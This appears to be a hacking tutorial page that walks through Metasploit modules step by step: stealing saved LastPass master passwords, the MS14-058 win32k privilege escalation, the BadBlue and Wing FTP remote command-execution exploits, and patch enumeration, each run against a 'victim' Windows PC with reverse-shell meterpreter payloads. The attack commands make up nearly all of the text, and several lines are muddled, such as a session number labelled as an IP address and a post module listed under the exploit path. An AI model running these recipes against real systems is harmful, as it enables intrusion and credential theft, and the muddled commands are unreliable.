Hack Saved LastPass Master Password in Remote Windows, Linux, MAC PC

This module extracts and decrypts LastPass master login accounts and passwords

Exploit Targets

lastpass

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use post/multi/gather/lastpass_creds

msf exploit (lastpass_creds)>set payload windows/meterpreter/reverse_tcp

msf exploit (lastpass_creds)>set lhost 192.168.1.103 (IP of Local Host)

msf exploit (lastpass_creds)>set session 1 (IP of Local Host)

msf exploit (lastpass_creds)>exploit

Hack Remote Windows PC using Windows Track Popup Menu Win32k NULL Pointer Dereference

This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability can be triggered through the use of TrackPopupMenu. Under special conditions, the NULL pointer dereference can be abused on xxxSend MessageTimeout to achieve arbitrary code execution. This module has been tested successfully on Windows XP SP3, Windows 2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows 2008 R2 SP1 64 bits.

Exploit Targets

Windows 7

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/local/ms14_058_track_popup_menu

msf exploit (ms14_058_track_popup_menu)>set payload windows/meterpreter/reverse_tcp

msf exploit (ms14_058_track_popup_menu)>set lhost 192.168.0.111 (IP of Local Host)

msf exploit (ms14_058_track_popup_menu)>set session 1 (IP of Local Host)

msf exploit (ms14_058_track_popup_menu)>exploit

Hack Remote Windows PC using BadBlue Exploit

BadBlue is software which can use for photos, videos, music, and business files with friends and colleagues instantly.

First scan badblue service the victim pc using nmap –sV 192.168.1.2

Open Kali terminal type msfconsole

Now type use exploit/windows/http/badblue_passthru

msf exploit (badblue_passthru)>set rhost 192.168.1.2 (Victim IP)

msf exploit (badblue_passthru)>set lhost 192.168.1.7 (IP of Local Host)

msf exploit (badblue_passthru)>exploit  

How to Gather Applied Patches in Remote Windows PC

This module will attempt to enumerate which patches are applied to a windows system based on the result of the WMI query: SELECT HotFixID FROM Win32_QuickFixEngineering

Exploit Targets

Windows 7

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/gather/enum_patches

msf exploit (enum_patches)>set payload windows/meterpreter/reverse_tcp

msf exploit (enum_patches)>set lhost 192.168.1.6 (IP of Local Host)

msf exploit (enum_patches)>set session 1

msf exploit (enum_patches)>exploit

Hack Remote Windows PC using Wing FTP Server Authenticated Command Execution

This module exploits the embedded Lua interpreter in the admin web interface for versions 4.3.8 and below. When supplying a specially crafted HTTP POST request an attacker can use os.execute() to execute arbitrary system commands on the target with SYSTEM privileges.

Exploit Targets

Wing FTP 4.3.8

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/ftp/wing_ftp_admin_exec

msf exploit (wing_ftp_admin_exec)>set payload windows/meterpreter/reverse_tcp

msf exploit (wing_ftp_admin_exec)>set lhost 192.168.0.10 (IP of Local Host)

msf exploit (wing_ftp_admin_exec)>set rhost 192.168.0.5 (IP of Remote Host)

msf exploit (wing_ftp_admin_exec)>set username rajchandel

msf exploit (wing_ftp_admin_exec)>set password --------

msf exploit (wing_ftp_admin_exec)>exploit